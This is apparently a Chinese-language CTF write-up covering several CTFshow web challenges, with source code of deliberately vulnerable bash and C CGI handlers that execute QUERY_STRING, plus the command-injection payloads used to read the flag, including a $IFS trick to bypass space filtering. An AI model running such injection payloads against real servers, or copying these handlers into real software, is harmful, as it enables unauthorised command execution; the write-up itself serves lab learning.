kali转bash shell方法
方便我们本地
bash脚本教程
下面这个代码是bash脚本
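#!/bin/bash
# CGI handler from a CTF challenge: splits QUERY_STRING on commas and, when
# the third field equals "admin", executes the first two fields as a command.
#
# The annotations in the original listing used "//", which is not comment
# syntax in bash: `IFS="," //...` tries to run "//..." as a command and leaves
# IFS unchanged, and `fi //...` is a syntax error. They are written as "#"
# comments here so the listing runs as intended.
#
# SECURITY: QUERY_STRING is supplied by the HTTP client. Everything below
# treats it as trusted, which makes this a textbook command injection.
OIFS="$IFS"
IFS=","                 # use the comma as the field separator while parsing
# Left unquoted on purpose so the shell splits the value on IFS. Unquoted
# expansion also applies pathname expansion to each field. The positional
# parameters set here are never read again; only Args is used.
set $QUERY_STRING
Args=($QUERY_STRING)    # the same comma-separated fields, as an array
IFS="$OIFS"             # restore the original IFS
# The "ctf" suffix on both sides is an old idiom for keeping the test
# well-formed with empty operands. "admin" is a fixed, public string, so this
# comparison is not an authentication check.
if [ "${Args[2]}"ctf = "admin"ctf ]; then
  # Runs field 0 as a program with field 1 as its argument list (IFS is back
  # to whitespace here, so $IFS only separates the two fields) and echoes the
  # output into the HTTP response. A real handler should map the request to a
  # fixed allow-list of actions and never execute request data.
  echo "`${Args[0]}$IFS${Args[1]}`"
fi
exit 0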
脚本把下标为 0 和 1 的两个字段拼成命令放进反引号执行,下标为 2 的字段只要等于 admin 即可,所以我们靠传入的这两个值构造命令
?ls,/,admin
?cat,/flag,admin
web462
#!/bin/bash
# CGI handler from a CTF challenge: when the first comma-separated field of
# QUERY_STRING is "ping", the second field is lightly rewritten and appended
# to "ping -c 1", and the resulting string is executed.
#
# SECURITY: QUERY_STRING comes from the HTTP client and is never validated as
# an address or hostname.

# Save IFS, split on commas while parsing, then restore it.
OIFS="$IFS"
IFS=","
# Unquoted on purpose so the value is split on IFS (pathname expansion is
# applied to the fields as well). The positional parameters set here are not
# read again; only Args is used.
set $QUERY_STRING
Args=($QUERY_STRING)
IFS="$OIFS"
# The "ctf" suffix on both sides is an old idiom for keeping the test
# well-formed with empty operands; the check itself is just Args[0] == "ping".
if [ "${Args[0]}"ctf = "ping"ctf ]; then
# Build the ping target from field 1 in three steps:
#   echo ${Args[1]}    prints the field; it is unquoted, so it is word-split
#                      and glob-expanded before echo sees it
#   sed 's|[\]||g'     deletes every backslash ([\] is a bracket expression
#                      holding a single backslash)
#   sed 's|%20| |g'    turns each literal "%20" into a space, i.e. a partial
#                      URL-decode of the query string
# Nothing here restricts the value to an address, so spaces (via %20) and
# leading dashes survive.
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"
addr="ping -c 1 "$addr
# $addr is expanded unquoted and run as a command: the shell word-splits it
# and executes "ping" with the remaining words as arguments. This is plain
# expansion, not eval, so characters such as ; | & in the value reach ping as
# literal argument text instead of being parsed as shell syntax. The request
# still controls every argument ping receives, options included (argument
# injection). A real handler should validate the field against an
# address/hostname pattern and pass it as one quoted argument.
$addr
fi
这个是思路看不懂代码先欠着
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"这句怎么看都晕,打通以后来改文章
?ping,
web463
#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>
/* just get lastest info */
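/*
 * Run `cmd` through popen() and keep the last chunk of its output.
 *
 * Every chunk read by fgets() is printed with a "Msg:" prefix; pRetMsg ends
 * up holding the final chunk (at most msg_len - 1 characters) with one
 * trailing newline removed, or an empty string if the command printed
 * nothing.
 *
 * Parameters:
 *   cmd      - command line handed to the shell by popen(); must not be NULL
 *   pRetMsg  - caller-provided output buffer; must not be NULL
 *   msg_len  - size of pRetMsg in bytes; must be greater than zero
 *
 * Returns 0 on success, -1 on bad parameters, -2 if popen() fails,
 * -3 if pclose() fails.
 *
 * SECURITY: popen() passes cmd to the shell, so cmd must never contain
 * untrusted data. This function performs no validation of its own.
 */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
    FILE *fp;
    size_t len;

    /* A zero-length buffer cannot hold even the terminator, so reject it
     * together with negative sizes. */
    if (cmd == NULL || pRetMsg == NULL || msg_len <= 0)
    {
        printf("Param Error!\n");
        return -1;
    }

    /* Execute the command and open a pipe that carries its stdout. */
    if ((fp = popen(cmd, "r")) == NULL)
    {
        printf("Popen Error!\n");
        return -2;
    }

    memset(pRetMsg, 0, msg_len);

    /* Each fgets() overwrites the buffer, so only the last chunk survives. */
    while (fgets(pRetMsg, msg_len, fp) != NULL)
    {
        printf("Msg:%s", pRetMsg); /* print all info */
    }

    /* Close the pipe and reap the child process. */
    if (pclose(fp) == -1)
    {
        printf("close popenerror!\n");
        return -3;
    }

    /* The original wrote pRetMsg[strlen(pRetMsg) - 1] unconditionally: with
     * no output that index wraps around and the write lands outside the
     * buffer, and with output lacking a newline it dropped a real character.
     * Strip only an actual trailing newline. */
    len = strlen(pRetMsg);
    if (len > 0 && pRetMsg[len - 1] == '\n')
    {
        pRetMsg[len - 1] = '\0';
    }
    return 0;
}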
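/*
 * Entry point of the challenge binary: prints a fixed HTML header, then runs
 * the raw QUERY_STRING as a shell command via _System() and prints the
 * return code, the last output chunk and its length.
 *
 * SECURITY: QUERY_STRING is controlled by the HTTP client and reaches
 * popen() unmodified, which is a direct command injection. A real handler
 * would map request parameters to fixed actions and never build a command
 * line from them.
 */
int main(void)
{
    char *cmd = NULL;
    char a8Result[128] = {0};
    int ret = 0;

    /* The source has no braces after the while, so only this printf is the
     * loop body; the braces here just make that visible.
     * NOTE(review): everything after the loop runs once, when FCGI_Accept()
     * stops returning >= 0. Presumably the binary is deployed as plain CGI;
     * confirm, because under a persistent FastCGI loop the command would not
     * run per request. */
    while (FCGI_Accept() >= 0)
    {
        printf("Content-type: text/html\r\n"
               "\r\n"
               "<title>CTFshow</title>"
               "<h1>where is flag?</h1>"
        );
    }

    /* getenv() may return NULL; _System() rejects a NULL command with -1. */
    cmd = getenv("QUERY_STRING");
    ret = _System(cmd, a8Result, sizeof(a8Result));

    /* strlen() returns size_t; the original passed it to %d directly, which
     * is a format/argument mismatch. The buffer is 128 bytes, so the cast to
     * int cannot truncate. */
    printf("ret = %d \nresult = %s\nlength = %d \n", ret, a8Result, (int)strlen(a8Result));
    return 0;
}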
试探性地传了一个 ls,有回显;然后发现空格被过滤了(贴出的源码里并没有过滤逻辑,更可能是 QUERY_STRING 没有经过 URL 解码,空格是以 %20 的形式原样交给 popen 的),尝试了一下 $IFS 可以绕过
?cat$IFS/f*
?cat${IFS}/f*
web464
#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>
/* just get lastest info */
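/*
 * Run `cmd` through popen() and keep the last chunk of its output.
 *
 * Every chunk read by fgets() is printed with a "Msg:" prefix; pRetMsg ends
 * up holding the final chunk (at most msg_len - 1 characters) with one
 * trailing newline removed, or an empty string if the command printed
 * nothing.
 *
 * Parameters:
 *   cmd      - command line handed to the shell by popen(); must not be NULL
 *   pRetMsg  - caller-provided output buffer; must not be NULL
 *   msg_len  - size of pRetMsg in bytes; must be greater than zero
 *
 * Returns 0 on success, -1 on bad parameters, -2 if popen() fails,
 * -3 if pclose() fails.
 *
 * SECURITY: popen() passes cmd to the shell, so cmd must never contain
 * untrusted data. This function performs no validation of its own.
 */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
    FILE *fp;
    size_t len;

    /* A zero-length buffer cannot hold even the terminator, so reject it
     * together with negative sizes. */
    if (cmd == NULL || pRetMsg == NULL || msg_len <= 0)
    {
        printf("Param Error!\n");
        return -1;
    }

    /* Execute the command and open a pipe that carries its stdout. */
    if ((fp = popen(cmd, "r")) == NULL)
    {
        printf("Popen Error!\n");
        return -2;
    }

    memset(pRetMsg, 0, msg_len);

    /* Each fgets() overwrites the buffer, so only the last chunk survives. */
    while (fgets(pRetMsg, msg_len, fp) != NULL)
    {
        printf("Msg:%s", pRetMsg); /* print all info */
    }

    /* Close the pipe and reap the child process. */
    if (pclose(fp) == -1)
    {
        printf("close popenerror!\n");
        return -3;
    }

    /* The original wrote pRetMsg[strlen(pRetMsg) - 1] unconditionally: with
     * no output that index wraps around and the write lands outside the
     * buffer, and with output lacking a newline it dropped a real character.
     * Strip only an actual trailing newline. */
    len = strlen(pRetMsg);
    if (len > 0 && pRetMsg[len - 1] == '\n')
    {
        pRetMsg[len - 1] = '\0';
    }
    return 0;
}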
/*
 * Entry point of the challenge binary: prints a fixed HTML header, then runs
 * the raw QUERY_STRING as a shell command via _System(). Unlike the previous
 * variant, the return code and captured result are not printed here; the
 * only command output in the response is what _System() itself prints with
 * its "Msg:" prefix.
 *
 * SECURITY: QUERY_STRING is controlled by the HTTP client and reaches
 * popen() unmodified, which is a direct command injection.
 */
int main(void)
{
    char lastLine[128] = {0};
    char *query;
    int status;

    /* The source has no braces after the while, so only the header printf is
     * the loop body; the braces here just make that visible.
     * NOTE(review): the command below runs once, after FCGI_Accept() stops
     * returning >= 0. Presumably the binary is deployed as plain CGI;
     * confirm. */
    while (FCGI_Accept() >= 0)
    {
        printf("Content-type: text/html\r\n"
               "\r\n"
               "<title>CTFshow</title>"
               "<h1>where is flag?</h1>"
        );
    }

    /* getenv() may return NULL; _System() rejects a NULL command with -1. */
    query = getenv("QUERY_STRING");
    status = _System(query, lastLine, sizeof(lastLine));
    (void)status; /* the result code is not reported in this variant */
    return 0;
}
与上题一样直接秒了
我只是想尝试一下没想到打通了
?cat$IFS/f*
web465
要用pwn 不会